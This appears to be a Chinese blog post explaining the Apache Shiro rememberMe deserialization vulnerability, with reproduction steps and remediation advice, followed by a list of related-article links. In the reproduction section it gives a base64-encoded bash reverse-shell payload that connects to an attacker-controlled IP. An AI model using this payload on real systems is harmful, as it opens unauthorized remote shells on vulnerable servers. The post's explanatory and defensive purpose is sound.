一、shiro简介

Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。

二、shiro的身份认证工作流程

  1. 通过前端传入的值,
  2. 获取rememberMe cookie
  3. base64加密
  4. AES加密 (对称加解密)
  5. 反序列化

三、shiro反序列化漏洞原理

AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞

四、shiro漏洞复现

(1)开启环境,抓包判断是否是shiro框架

在cookie后边加上rememberMe=1,如果回复包出现rememberMe=deleteMe,说明他就是shiro框架

(2)获取key值,因为key值在源码中,所以需要使用工具获取

(3)爆破利用链

(4)执行反序列化漏洞命令执行

(5)利用shrio反弹shell

payload:bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4OC40NC4xNzAvODg4OCAwPiYx}|{base64,-d}|{bash,-i} //需要修改为vps的地址在进行base64加密

监听端口:

(5)使用另外一个工具进行爆破

由于工具失效了就不演示了

五、shiro反序列化漏洞的修复

  1. 删除代码里的默认密钥
  2. 默认配置里注释了默认密钥
  3. 升级shiro到1.2.5及以上
  4. 如果在配置里配置了密钥,那么请一定不要使用网上的密钥,一定不要!!
  5. 请自己base64一个AES的密钥,或者利用官方提供的方法生成密钥:org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()

shiro反序列化漏洞的原理和复现相关推荐

  1. shiro反序列化漏洞学习(工具+原理+复现)

    工具准备 1.java8 C:\Program Files\Java 2.冰蝎 C:\Users\ali\Desktop\tools\Behinder_v4.0.6 3.shiro反序列化 图形化工具 ...

  2. 【漏洞复现】Apache Shiro 反序列化漏洞

    Apache Shiro 反序列化漏洞 一.简介 二.环境 三.漏洞原理 四.AES秘钥 1.判断AES秘钥 五.Shiro rememberMe反序列化漏洞(Shiro-550) 1.版本1.4.2 ...

  3. vulhub复现之shiro反序列化漏洞复现

    目录 什么是shiro? 什么是安全框架? 反序列化与序列化 shiro反序列化漏洞 怎么判断是否存在反序列化漏洞? 什么是shiro? shiro是功能强大且容易使用的java安全框架.shiro可 ...

  4. Shiro反序列化漏洞利用笔记

    Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证.授权.密码和会话管理.目前在Java web应用安全框架中,最热门的产品有Spring Sec ...

  5. 经典的Shiro反序列化漏洞分析

    更多黑客技能 公众号:小道黑客 作者:掌控安全-holic 0x01.前言 相信大家总是面试会问到java反序列化,或者会问到标志性的漏洞,比如shiro反序列化,或者weblogic反序列化漏洞. ...

  6. Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)

    Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721) Shiro简介 Apache Shiro 是一个强大易用的Java安全框架,提供了认证.授权.加密和会话管理等功能,Shiro ...

  7. 4加密问题漏洞修复_Apache Shiro 反序列化漏洞实战

    Apache Shiro是一个Java安全框架,执行身份验证.授权.密码和会话管理.2016年,网络中曝光1.2.4以前的版本存在反序列化漏洞.尽管该漏洞已经曝光几年,但是在实战中仍然比较实用.花了点 ...

  8. 实战渗透-Shiro反序列化漏洞实例

    0x01.前言 这是一次授权的渗透测试,技术含量不高,但我始终相信,每一次的积累,都是为了成就更好的自己,所以过程简洁,记录下每个知识点.对渗透而言,我更喜欢实战的体验感,那种喜悦和知识的获取感,永远 ...

  9. shiro反序列化漏洞修复

    文章目录 shiro反序列化漏洞修复 前言 解决方案 shiro反序列化漏洞修复 前言 最近项目在进行安全漏洞扫描的时候,出现一个shiro的反序列化漏洞的问题:目标IP站点存在Apache shir ...

最新文章

  1. WinAPI: SetRect 及初始化矩形的几种办法
  2. DateGridView的外观美化
  3. 元对象我所理解的设计模式(C++实现)——享元模式(Flyweight Pattern)
  4. hibernate-validate
  5. .NET Core实战项目之CMS 第十章 设计篇-系统开发框架设计
  6. 第2、3讲 图像的存储格式
  7. 从Java程序员进阶到架构师,6大核心技能要领详解
  8. SayMedia总览
  9. token 防止csrf
  10. mysql left join 右表数据不唯一的情况解决方法
  11. 新浪微博自动发送微博 功能已实现(net)
  12. mysql备份单实例(一)shell
  13. 一个非常好用的代理服务器软件AllegroSurf
  14. linux 系统安装微信小程序开发工具
  15. appium自动化测试
  16. 原始套接字Raw Socket基础-- WSADATA wsaData(转)
  17. Plugin工具类-Unreal4源码拆解-UnrealBuildTool功能流程解析
  18. 自律努力有目标的人生有多美
  19. 谈谈数据结构的重要性
  20. python十六进制转换成八进制_怎么把十六进制转化为八进制

热门文章

  1. Android persist类property 知识点
  2. C语言system()函数
  3. java中Date的getTime()函数
  4. 京东商品滞销怎么处理,如何一键清理?
  5. 如何使用Chrome浏览器,打包生成自己的插件(crx格式文件)?
  6. Silverlight Blend动画设计系列十一:沿路径动画(Animation Along a Path)
  7. 领域驱动设计战术模式:领域事件
  8. Linux系统下如何复制粘贴
  9. 计算机专业如何自己增加项目经验?
  10. vue项目 使用百度云 cyberplayer.js插件方法